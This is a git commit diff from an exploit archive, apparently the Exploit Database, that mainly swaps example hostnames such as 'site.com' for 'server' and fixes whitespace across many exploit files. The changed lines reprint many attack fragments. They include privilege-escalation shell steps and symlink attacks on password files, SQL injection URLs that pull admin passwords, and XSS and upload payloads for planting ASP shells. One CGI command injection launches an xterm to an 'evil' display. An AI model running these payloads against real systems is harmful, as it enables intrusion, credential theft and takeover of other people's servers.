DB: 2016-09-03

14 new exploits

Too many to list!
This commit is contained in:
Offensive Security 2016-09-03 05:08:42 +00:00
parent f96ddba143
commit 31a21bb68d
8960 changed files with 12206 additions and 12354 deletions

2202
files.csv

File diff suppressed because it is too large Load diff

View file

@ -74,7 +74,7 @@ if len(sys.argv) < 3:
print " "
print ' usage: %s http://server.com/path/ day-mounth-year' % os.path.basename(sys.argv[0])
print ' usage: %s http://server/path/ day-mounth-year' % os.path.basename(sys.argv[0])
print " "
@ -88,7 +88,7 @@ if len(sys.argv) < 3:
print "_______________________________________________________________"
sys.exit("\nexample: http://www.server.com/ 16-10-2010")
sys.exit("\nexample: http://server/ 16-10-2010")

View file

@ -13,4 +13,4 @@ $ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/winstall
$ /tmp/sh
#
#

View file

@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/59/info
/etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.
$ /etc/crash
! sh
! sh

View file

@ -12,4 +12,4 @@ HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
[ and it just hangs ]
$ ping some.where
[ ...nothing... ]
[ ...nothing... ]

View file

@ -7,4 +7,4 @@ $ nmap -p 1-64000 -i <target host>
It is also claimed inetd will die if the Windows 95/NT
program postscan.exe, made by 7thsphere, is run againts
the host.
the host.

View file

@ -14,15 +14,15 @@ and no any filter for html code at robots.lib.php. you can inject your html code
html inj.:
target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
server/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
after you go here:
target.com/robotstats/info-robot.php?robot=(robot id)
server/robotstats/info-robot.php?robot=(robot id)
or
target.com/robotstats/admin/robots.php you will see your html page
server/robotstats/admin/robots.php you will see your html page
analysis: (/admin/robots.php)

View file

@ -11,4 +11,4 @@ ln -s /etc/passwd /tmp/fwlsuser.$x
let x=$x+1
echo $x
done
exit
exit

View file

@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/375/info
The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file.
snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.
snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.

View file

@ -26,4 +26,4 @@ echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh
./mailsh

View file

@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/455/info
There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format.
/usr/sbin/lquerypv -h /pathtofilename
/usr/sbin/lquerypv -h /pathtofilename

View file

@ -4,4 +4,4 @@ The sgihelp program, from SGI and included with IRIX 5.1 and 5.2, contains a vul
Run PrintStatus
Press the 'help' button.
Select the 'print to command' option. This will allow you to execute anything as root.
Select the 'print to command' option. This will allow you to execute anything as root.

View file

@ -7,4 +7,4 @@ gcc -g -o a.out hello-world.c
$ adb a.out -
adb
.main,5:s
a.out: running
a.out: running

View file

@ -14,4 +14,4 @@ chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh
/tmp/.shh

View file

@ -4,4 +4,4 @@ IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
fopen: No such file or directory

View file

@ -8,4 +8,4 @@ IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulne
ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$
$$ rm /tmp/log. $$

View file

@ -13,4 +13,4 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxx
[dead]
[dead]

View file

@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/64/info
There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.
$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'
$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'

View file

@ -4,4 +4,4 @@ NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsol
Gordano's own JUCE product (to prevent mail relay attacks and other SPAM activity) will not prevent NTMAIL v.3.x from being used as a mail relay.
Specify <> in the 'Mail From' field.
Specify <> in the 'Mail From' field.

View file

@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/458/info
A problem with the way login parses arguments as passed by rlogind that may allow access to the root account.
%rlogin -froot targethost.com
%rlogin -froot targethost.com

View file

@ -12,7 +12,7 @@
[~] 1.Save code html format
[~] 2.Search Target.com
[~] 2.Search server
[~] 3.Edit and replace & Target
@ -26,7 +26,7 @@
[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
[~] 9.Target.com/images/uploads/File/File Name
[~] 9.server/images/uploads/File/File Name
[~]######################################### ExploiT
#############################################[~]
@ -62,7 +62,7 @@ Connector:<br />
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="
http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
http://server/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
">PHP</option>
<option value="py/connector.py">Python</option>
</select>

View file

@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in
TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected.
<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>
<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>

View file

@ -46,4 +46,4 @@
************************************************************
************************************************************
************************************************************

View file

@ -23,4 +23,4 @@ soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<Item>0</Item>
</tns:ArrayOfint>
</soap:Body>
</soap:Envelope>
</soap:Envelope>

View file

@ -4,4 +4,4 @@ Sigma Portal is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)

View file

@ -30,7 +30,7 @@ if (@ARGV < 2)
print " 2 ==> Version 1.36, 2.0 and Next\n";
print "==========================================\n\n";
print "Example:\n\n";
print " Max.pl www.Site.com 1\n";
print " Max.pl www.server 1\n";
exit();
}
$hell = "foo' or M_Name='admin";

View file

@ -7,7 +7,7 @@ Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
----------------Discovered by: s d <irsdl@yahoo.com>------------------------------------------
*/
# Config ________________________________
# address - example: http://www.site.com/password.asp
# address - example: http://www.server/password.asp
$url = "http://www.mohamad.com/password.asp";
$mh = "s1";
# if webmaxportal version is : Version 1.35 and older please input $mh= "s1"

View file

@ -23,4 +23,4 @@ http://server/default.asp?catid=39+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,1
Greetz :
WwW.IQ-ty.CoM
| CraCkEr | Cyber-Zone | str0ke | jiko
| CraCkEr | Cyber-Zone | str0ke | jiko

View file

@ -1,4 +1,4 @@
_ _ _ _ _ _ _ _ _ _ _ _ _ _ __ _ _ _ _ _____1337~h4x0rZ__ _ ___ ___
_ _ _ _ _ _ _ _ _ _ _ _ _ _ __ _ _ _ _ _____1337~h4x0rZ__ _ ___ ___
/_/Rd_ _ / _ _\/ _ _ / \ \< |/_ _ / /\ | \ /\ || \( ) /\ | \ (| |
\_ _ _ _/ /_ _ / / __ | () / | | / / [d0t]com/@~\ | (O) / /+~\ ||_O_|( ) /0O\ | \ | |
_ _ _ _\ \_ _ \ \ _ _ _ | \ | | / /_ _ /|__|\ | \ /|__|\|| O |( ) /+__+\| ^ \ | |

View file

@ -15,7 +15,7 @@
[*] Err0r C0N50L3:
[*] www.target.com/player.asp?player_id={EV!L BL!ND INJ}
[*] server/player.asp?player_id={EV!L BL!ND INJ}
[*] EV!L BL!ND

View file

@ -15,7 +15,7 @@
[*] Err0r C0N50L3:
[*] www.target.com/[path]/admin/edit.asp?ID={EV!L blind sql}
[*] server/[path]/admin/edit.asp?ID={EV!L blind sql}
[*] EV!L BL!ND sql

View file

@ -15,7 +15,7 @@
[*] Err0r C0N50L3:
[*] www.target.com/[path]/campaignEdit.asp?CCam={EV!L blind sql}
[*] server/[path]/campaignEdit.asp?CCam={EV!L blind sql}
[*] EV!L BL!ND sql

View file

@ -67,4 +67,4 @@ Thanks You: eXceptioN,CodeInside,CorDoN,Hack3ra,Rex aL0ne,By_HKC
###########################################################################
###########################################################################

View file

@ -24,7 +24,7 @@ if (@ARGV < 1)
print " Usage:ASPNuke.pl <T4rg3t> \n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " ASPNuke.pl www.Site.com \n";
print " ASPNuke.pl www.server \n";
exit();
}

View file

@ -1,4 +1,4 @@
#####################################################
#####################################################
# [+] Author : RENO #
# [+] Email : R7e@HoTMaiL.coM #
# [+] Site : www.vxx9.cc #

View file

@ -1,4 +1,4 @@
#####################################################
#####################################################
# [+] Author : RENO #
# [+] Email : R7e@HoTMaiL.coM #
# [+] Site : www.vxx9.cc #

View file

@ -26,7 +26,7 @@
[ª]dem0:
http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
http://www.server/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
Admin:[Path]/admin/login.asp

View file

@ -8,5 +8,5 @@
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
# http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
#################################################################

View file

@ -8,7 +8,7 @@ Vulnerability:
=======================
Arbitrary File Upload
=======================
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
<form action = "http://server/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
<p align="center">
<input type=file name=uploadfile size=100><br> <br>
<input type=submit value=Upload>  </p>
@ -18,19 +18,19 @@ Arbitrary File Upload
=======================
Arbitrary File Upload 2
=======================
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
http://server/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
=======================
Database Disclosure
=======================
http://site.com/ewebeditor/db/ewebeditor.mdb
http://server/ewebeditor/db/ewebeditor.mdb
=======================
Administrator bypass
=======================
http://site.com/eWebEditor/admin/login.asp
http://server/eWebEditor/admin/login.asp
put this code instead URL
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
@ -39,11 +39,11 @@ javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
=======================
Directory Traversal
=======================
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
=======================
Directory Traversal 2
=======================
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..
http://server/ewebeditor/asp/browse.asp?style=standard650&dir=./..

View file

@ -1,4 +1,4 @@
#######################################################################
#######################################################################
# #
### DA Mailing List System V2 Remote Admin Login Exploit ###
# #

View file

@ -70,4 +70,4 @@ CoreLabs, the research center of Core Security Technologies, is charged with ant
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

View file

@ -29,4 +29,4 @@
*""""""""""""""""""""
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....

View file

@ -36,4 +36,4 @@ Da&#287;lar&#305; deviriverdin üstüme hiç çekinmedin
Ben bu &#351;ehirde bir daha da sabah görmedim
Günayd&#305;nlar olmad&#305; günler aymad&#305; sensiz ........
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------

View file

@ -1,4 +1,4 @@
=========================================
=========================================
Web Wiz Forums 9.68 SQLi Vulnerability
=========================================
@ -22,9 +22,9 @@ Xploit: SQLi Vulnerability
DEMO URL:
http://site.com/new_reply_form.asp?TID=[SQLi]
http://server/new_reply_form.asp?TID=[SQLi]
###############################################################################################################
# 0day no more
# Sid3^effects
# Sid3^effects

View file

@ -1,4 +1,4 @@
======================================================
======================================================
Virtual Real Estate Manager V 3.5 SQLi Vulnerability
======================================================
@ -27,4 +27,4 @@ DEMO URL:
###############################################################################################################
# 0day no more
# Sid3^effects
# Sid3^effects

View file

@ -22,9 +22,9 @@ Xploit: SQLi Vulnerability
DEMO URL:
http://site.com/reallusiontv/ic/productdemo.asp?page=[SQLi]
http://server/reallusiontv/ic/productdemo.asp?page=[SQLi]
###############################################################################################################
# 0day no more
# Sid3^effects
# Sid3^effects

View file

@ -42,7 +42,7 @@ Admin Control:
Usename:admin
Password:admin
DEMO URL :http://site.com/onlinenotebookmanager.asp?ItemID=[SQLi]
DEMO URL :http://server/onlinenotebookmanager.asp?ItemID=[SQLi]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

View file

@ -18,7 +18,7 @@
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Smart ASP Survey SQL & XSS Vulnerable
Vendor url:http://www.sellatsite.com
Vendor url:http://www.sellatserver
Version:n/a
Published: 2010-06-15
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to

View file

@ -19,7 +19,7 @@
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:SAS Hotel Management System SQL Vulnerable
Vendor url:http://www.sellatsite.com
Vendor url:http://www.sellatserver
Version:n/a
Price:28$
Published: 2010-06-15

View file

@ -32,4 +32,4 @@ Sex
Crew : IMHATIMI.ORG ~ MecTruy ~ Dr.Ly0n ~ Noxy ~ FreWaL
##################################################################################
##################################################################################

View file

@ -17,9 +17,9 @@
---
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
http://www.server/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
---
@ -100,7 +100,7 @@ print q
Usage:
perl phportal.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
<Target Website> - Path to target eg: www.victim.com
<Shell Location> - Path to shell eg: http://site.com/r57.txt?
<Shell Location> - Path to shell eg: http://server/r57.txt?
<CMD Variable> - Shell command variable name eg: Pwd
<r> - Show output from shell
<p> - sablonlar/gunaysoft/gunaysoft.php

View file

@ -12,7 +12,7 @@ if (@ARGV < 3)
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
i.e. perl mini-nuke.pl "someserver" / 52 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;

View file

@ -18,4 +18,4 @@ http://server/main.asp?id=5945&grp=[SQL Injection]
[~]######################################### FinisH :D #############################################[~]

View file

@ -27,11 +27,11 @@ i-Gallery is a complete online photo gallery. Easy to navigate thumbnails with p
#######################################################################################################
Xploit :Arbitrary File Include Vulnerabilty
DEMO URL http://www.site.com/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
DEMO URL http://www.server/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
Xploit :Persistent XSS Vulnerabilty
DEMO URL http://www.site.com/igallery34/submitphotos.asp?mi=1
DEMO URL http://www.server/igallery34/submitphotos.asp?mi=1

View file

@ -11,11 +11,11 @@ Dork : inurl:hikaye.asp?id=
===================================================
[+] Vulnerable File : http://www.site.com/hikaye.asp?id=123
[+] Vulnerable File : http://www.server/hikaye.asp?id=123
===================================================
[+] Demo : http://www.site.com/hikaye.asp?id=17'a
[+] Demo : http://www.server/hikaye.asp?id=17'a
===================================================

View file

@ -11,11 +11,11 @@ Dork : inurl:makaledetay.asp?id=
===================================================
[+] Vulnerable File : http://www.site.com/makaledetay.asp?id=123
[+] Vulnerable File : http://www.server/makaledetay.asp?id=123
===================================================
[+] Demo : http://www.site.com/makaledetay.asp?id=15%27a
[+] Demo : http://www.server/makaledetay.asp?id=15%27a
===================================================

View file

@ -13,14 +13,14 @@ Dork : :/ sorry
[+] Vulnerable File :
http://www.site.com/default.asp?islem=devami&id=38%20union+select+all+0,
http://www.server/default.asp?islem=devami&id=38%20union+select+all+0,
sifre,2,3%20,4,5+from+aky_ayarlar
===================================================
[+] Demo :
http://www.site.com/blog/default.asp?islem=devami&id=38%20union+s
http://www.server/blog/default.asp?islem=devami&id=38%20union+s
elect+all+0,sifre,2,3%20,4,5+from+aky_ayarlar
===================================================
@ -31,4 +31,4 @@ and all www.worldhackerz.com Member
===================================================
# Turkish P0wer
# Turkish P0wer

View file

@ -1,4 +1,4 @@
=======================================
=======================================
netStartEnterprise v4.0 SQL Injection Vulnerability
=======================================
@ -15,7 +15,7 @@
# Version: netStartEnterprise v4.0
# Path: http://www.site.com/previeweventdetail.aspx?id=[SQL]
# Path: http://www.server/previeweventdetail.aspx?id=[SQL]
# Platform: ASP

View file

@ -84,7 +84,7 @@ sub usage()
{
head();
print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
print " <Site> - Full path to Guestbook e.g. http://www.server/guestbook/ \r\n";
print "=======================================================================\r\n";
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";

View file

@ -11,10 +11,10 @@ Vulnerability : (Auth Bypass) SQL Injection Vulnerability
[Auth Bypass]:
user: pouya
pass: ' or '
admin page : http://site.com/[path]/admin.asp
admin page : http://server/[path]/admin.asp
---------------------------------
Victem :
http://www.etoshop.com/demo/pcstore
---------------------------------------------------------
#########################################################

View file

@ -123,4 +123,3 @@ Persistent XSS Vulnerabilities:
===========================================================================================

View file

@ -43,7 +43,7 @@ Step 1) Login into member or User Section
Link:
http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
Step 2) Go to Edit profile
@ -66,7 +66,7 @@ Step 3) Enter your Attack Pattern
Step 4) Refresh and View User profile
Demo Url:-
http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~

View file

@ -38,7 +38,7 @@ Vulnerability:
DEMO URL:
http://www.site.com/detail.asp?ad_ID=1&vehicletypeID=[sqli]
http://www.server/detail.asp?ad_ID=1&vehicletypeID=[sqli]
# 0day n0 m0re #

View file

@ -45,7 +45,7 @@ if id<>"" then
lots of files those will have to do input validation from user input are vulnerable to SQL Injection .
PoC :
www.site.com/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
www.server/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
note : if you can't see result you need to do it blindly
@ -53,7 +53,7 @@ note : if you can't see result you need to do it blindly
2- Bypass uploads restriction:
after you got user/pass with sql injection go to
http://site.com/admin/dc_upload.asp
http://server/admin/dc_upload.asp
js file line 13-34 :
@ -82,4 +82,4 @@ function showthumb(file) {
as you can see the uploader will check malicious extention by javascript . just disable javascript and you can upload "ASP" shell.
you can find your shell in : www.site.com/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)
you can find your shell in : www.server/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)

View file

@ -65,4 +65,3 @@ PoC:
Note that : the value 2010_7_25 is the exact date of server.
===========================================================================================

View file

@ -46,14 +46,14 @@ Description :
Considering to the code, you can browse these URLs:
http://www.site.com/module/article/article/article.asp?articleid=7' (the false Query will be shown)
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)
http://www.server/module/article/article/article.asp?articleid=7' (the false Query will be shown)
http://www.server/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)
with the following URL you can find the first character of Username:
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
and second character:
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
and so on.

View file

@ -83,4 +83,3 @@ This page remove Admins Role in VWD-CMS.
===========================================================================================

View file

@ -179,4 +179,3 @@ Persistent XSS and XSRF:
===========================================================================================

View file

@ -183,4 +183,3 @@ This page uploads a file
===========================================================================================

View file

@ -61,4 +61,3 @@ Persistent XSS in admin section:
===========================================================================================

View file

@ -9,7 +9,7 @@ Gokhun ASP Stok v1.0 - Multiple Remote Vulnerabilities
~Script : Gokhun ASP Stok v1.0
~Software: http://www.gokhun.com & http://www.aspindir.com/goster/6092
~Vulnerability Style : Multiple vulnerabilities
~Demo : http://www.site.com/asp/pages/main/
~Demo : http://www.server/asp/pages/main/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
======== SQL Injection =========
@ -51,7 +51,7 @@ print "[-]Ornegi inceleyin\n\n";
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage1 : perl $0 server /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

View file

@ -160,4 +160,3 @@ This page uploads a file with "xml" extension
</html>
===========================================================================================

View file

@ -40,7 +40,7 @@ if len(sys.argv) < 2:
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

View file

@ -38,7 +38,7 @@ if len(sys.argv) < 2:
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

View file

@ -29,7 +29,7 @@ if len(sys.argv) < 2:
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " python exploit.py http://server/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

View file

@ -49,7 +49,7 @@ print "[-]Ornegi inceleyin\n\n";
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage1 : perl $0 server /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

View file

@ -29,7 +29,7 @@ private void Page_Load(object sender, EventArgs e)
}
[-] End Poc
[#] Exploit :
http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
http://server/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
[2] Remote File Upload :
@ -41,14 +41,14 @@ string acceptedFiles =
";.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;";
You Can Bypass
[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*]
[#] Exploit :http://server/DesktopModules/ftb/ftb.imagegallery.aspx[*]
[3] Information Leakage Show Device Info :
http://Site.Com/security/DeviceInfo.aspx
http://server/security/DeviceInfo.aspx
[4] Xss Present :
http://Site.Com/security/DeviceInfo.aspx
http://server/security/DeviceInfo.aspx
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.BlogDB
Submit Data Without Check{
@ -104,7 +104,7 @@ SqlDbType.NVarChar, 100);
command.ExecuteNonQuery();
sqlConnectionString.Close();}
[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx
[#] Exploit :http://server/DesktopModules/Blog/BlogView.aspx
[-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-]
